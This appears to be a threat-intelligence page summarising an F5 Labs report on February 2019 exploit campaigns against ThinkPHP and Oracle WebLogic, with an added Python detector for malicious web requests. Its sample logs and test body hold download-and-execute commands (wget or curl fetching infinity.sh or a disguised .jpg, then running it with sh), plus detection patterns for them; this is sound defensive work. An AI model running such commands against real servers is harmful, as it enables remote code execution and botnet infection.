TTPwire Vol. 1 · MITRE ATT&CK·Tagged


F5 Labs

Vulnerabilities, Exploits, and Malware Driving Attack Campaigns in February 2019

2019-03-12

ATT&CK techniques detected

7 predictions
T1190 Exploit Public-Facing Application
98%
"intelligence/vulnerabilities--exploits--and-malware-driving-attack-campaigns-.html). Other targeted vulnerabilities in February were Jenkins CLI SignedObject deserialization (CVE-2017-1000353), Elasticsearch remote code execution vulnerability (CVE-2…"
T1204.002 Malicious File
96%
"actor instructed the server to download and execute a malicious file with a .jpg extension. Figure 10. Vulnerable server downloaded and executed the malicious JPG file. The malicious JPG file downloaded on a vulnerable server contains two functions (b, d) with distinct purposes.…"
T1190 Exploit Public-Facing Application
83%
"campaign for Oracle WebLogic. The vulnerability was first published in 2017 and since then, we have seen various threat actors looking to exploit it. In this campaign, the threat actor sent a Python payload, which contained a base64-encoded string. Figure 8. Oracle WebLogic WLS…"
T1190 Exploit Public-Facing Application
77%
"-attack-thingbots-threaten-intern.html).) In the example shown in Figure 3, a known threat actor targeted ThinkPHP servers; Figure 4 shows the contents of the downloaded file “infinity.sh”. Figure 3. A new threat actor targeting ThinkPHP servers. Figure 4. Contents o…"
T1588.006 Vulnerabilities
76%
"Vulnerabilities, Exploits, and Malware Driving Attack Campaigns in February 2019. Security researchers at F5 Networks constantly monitor web traffic at various locations throughout the world. This allows us to detect current “in the wild” malware, and to get an insight into a th…"
T1525 Implant Internal Image
38%
"instances.” A user can use instance metadata to configure or manage the running instance. Because instance metadata is available from within a running instance, the Amazon EC2 console or the AWS CLI are not needed. To view all categories of instance metadata from within a runnin…"
T1190 Exploit Public-Facing Application
30%
"attempted reconnaissance, in February all of the campaigns attempted to exploit the vulnerable server by either running a variant of the Mirai botnet or trying to create a reverse shell back to the threat actor. To learn more details about this vulnerability, please refer to our …"

Summary

Continuing the trend from January, threat actor activity in February focused heavily on exploiting a ThinkPHP remote code execution vulnerability.
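Several of the excerpts above describe the same post-exploitation pattern: a request to a public-facing application carries a shell command that fetches a file (infinity.sh, a script with a .jpg extension, or a Python one-liner wrapping a base64 string) and then runs it. The detector below is added here as an example and is not code from the F5 Labs article. It parses combined-format access-log lines, URL-decodes the request target, flags download-then-execute chains and scripts disguised as images, and unwraps an embedded base64 Python stage so the second-stage command can be classified as well. Every log line, address, hostname and file name in the samples is constructed, and the function names are this example's own.

```python
"""Flag download-and-execute chains and encoded Python stages in web requests.

Added example; not code from the F5 Labs article. All sample data is constructed.
"""
import base64
import re
from urllib.parse import unquote_plus

# Constructed combined-format access-log lines (addresses from documentation ranges).
SAMPLE_LOG = r'''
203.0.113.7 - - [12/Feb/2019:03:14:07 +0000] "GET /index.php?s=/index&cmd=wget%20http%3A%2F%2F198.51.100.9%2Finfinity.sh%20-O%20%2Ftmp%2Fi.sh%3B%20sh%20%2Ftmp%2Fi.sh HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.8 - - [12/Feb/2019:03:15:22 +0000] "GET /index.php?cmd=curl%20-s%20http%3A%2F%2F198.51.100.9%2Fx.jpg%20-o%20%2Ftmp%2Fx.jpg%3B%20sh%20%2Ftmp%2Fx.jpg HTTP/1.1" 200 312 "-" "curl/7.58.0"
203.0.113.9 - - [12/Feb/2019:03:16:40 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 0 "-" "python-requests/2.21.0"
198.51.100.20 - - [12/Feb/2019:03:17:01 +0000] "GET /images/logo.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''

# Constructed second stage wrapped in a base64 Python one-liner, the shape the page describes
# for the WebLogic campaign. A body like this comes from a WAF or packet capture, not the access log.
INNER_STAGE = 'import os;os.system("curl -s http://198.51.100.9/infinity.sh | sh")'
SAMPLE_BODY = 'python -c "import base64;exec(base64.b64decode(%r))"' % (
    base64.b64encode(INNER_STAGE.encode()).decode())

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
DOWNLOADER_RE = re.compile(r'\b(?:wget|curl)\b', re.I)
# An interpreter or chmod after a pipe or command separator: the "execute" half of the chain.
EXECUTE_RE = re.compile(r'(?:\||;|&&)\s*(?:sh|bash|chmod\s+\+x|python[23]?|perl)\b', re.I)
# A shell fed a file whose extension claims it is an image.
IMAGE_EXEC_RE = re.compile(r'\b(?:sh|bash|source)\s+\S+\.(?:jpe?g|png|gif)\b', re.I)
B64_PY_RE = re.compile(r'b64decode\(\s*[\'"]([A-Za-z0-9+/=]+)[\'"]\s*\)')


def parse_combined(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(text):
    """Return indicator names found in a decoded request target or body."""
    hits = []
    if DOWNLOADER_RE.search(text) and EXECUTE_RE.search(text):
        hits.append('download_then_execute')
    if IMAGE_EXEC_RE.search(text):
        hits.append('script_disguised_as_image')
    if B64_PY_RE.search(text):
        hits.append('base64_python_payload')
    return hits


def decode_embedded_base64(text):
    """Decode the first base64 literal passed to b64decode(), or None if absent or malformed."""
    m = B64_PY_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode('utf-8', 'replace')
    except ValueError:  # binascii.Error (bad alphabet or padding) is a ValueError
        return None


def scan_log(log_text):
    """Return (ip, raw target, indicators) for every parseable line with at least one indicator."""
    findings = []
    for line in log_text.strip().splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        # Decode %XX first so ';', '|' and the fetched URL are visible to the patterns.
        hits = classify(unquote_plus(rec['target']))
        if hits:
            findings.append((rec['ip'], rec['target'], hits))
    return findings


def analyze_body(body):
    """Classify a request body, then unwrap an embedded base64 stage and classify that too."""
    report = {'outer': classify(body), 'decoded': None, 'inner': []}
    inner = decode_embedded_base64(body)
    if inner is not None:
        report['decoded'] = inner
        report['inner'] = classify(inner)
    return report


if __name__ == '__main__':
    for ip, target, hits in scan_log(SAMPLE_LOG):
        print(ip, hits, unquote_plus(target))
    print(analyze_body(SAMPLE_BODY))
```

Run stand-alone, the script flags the two GET requests that chain a downloader into a shell, and the second one additionally as a script disguised as an image. The WebLogic-style POST line yields nothing from the access log alone, because the payload travels in the request body; that is why analyze_body takes the body as a separate input, and why the base64 stage has to be decoded before the download-and-execute pattern inside it becomes visible.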